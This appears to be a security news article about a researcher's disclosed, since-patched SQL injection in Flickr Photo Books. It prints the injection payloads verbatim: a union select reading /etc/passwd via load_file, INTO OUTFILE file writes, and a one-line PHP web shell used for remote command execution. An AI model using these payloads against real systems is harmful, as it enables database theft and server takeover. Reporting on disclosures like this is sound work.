The giant of online photo management and sharing Flickr, a Yahoo-owned company, was affected by critical vulnerabilities which allow attackers to gain access to the webserver website database.
The alarming discovery was announced by the Egyptian security expert Ibrahim Raafat which has found a critical SQL injection vulnerability in Flickr Photo Books, the feature implemented by Flickr for printing custom photo books through the image hosting website.
The service Flickr Photo Books was recently launched, nearly 5 months ago, Raafat has discovered that manipulating some parameters he was able to conduct an SQL injection on the website. Acting on the two parameters:
Raafat was able to conduct a Blind SQL injection meanwhile one through the modification of the parameter order_id he was able to conduct a Direct SQL Injection that provided the researcher a full access to the Flickr database.
Raafat started to analyze the HTTP headers for all the requests sent to the platform and started checking every single parameter, when he has found Direct SQL injection in order_id parameter POST
order_id=116564954&first_name=aaaa&last_name=sssss&street1=ddddddddddd&street2=ddddddd&city=fffffff&state=ff&postal_code=12547&country_code=US&phone=45454545457&method=flickr.products.orders.setShippingAddress&csrf=1365645560%3Acmj2m0s5jvyrpb9%kld65d65d54d54d55d45dsq&api_key=3c7ab2846f4183ecg56s96d5d5w4e644268&format=json&hermes=1&hermesClient=1&reqId=q3oovqa&nojsoncallback=1
But as remarked by the researcher the SQL injection vulnerability could be exploited by attackers also for remote code execution on the Flickr server, he succeeded to read some server files (e.g. such as /etc/passwd and some log files) by using LOAD_FILE function
order_id=-116564954 union
select load_file(“/etc/passwd“),2,3,4,5,6,7,8,9,10,11,12,13,14,15– -
To complete his hack Raafat has also written new files on the server file system, in this way combining the use of load_file function it was able to write and execute any kind of script directly on the server, allowing an attacker to upload a a code execution shell.
order_id=-116564954 union select “@RaafatSEC“,2,3,4,5,6,7,8,9,10,11,12,13,14,15 INTO OUTFILE “/tmp/raafat“– -
I tested reading it via load_file, it worked, Check the video
Changing the text and file path to my code
order_id=-116564954 union select “<?php $cmd = $_GET['raafat']; echo sy stem ($cmd); ?>“,2,3,4,5,6,7,8,9,10,11,12,13,14,15 INTO OUTFILE “/home/$path/rce.php“– -
/rce.php?raafat=ls -la
Following the Video POC published by the security expert:
Yahoo has immediately patched the flaws after the researcher reported it to Yahoo.
(Security Affairs – Flickr, SQL Injection)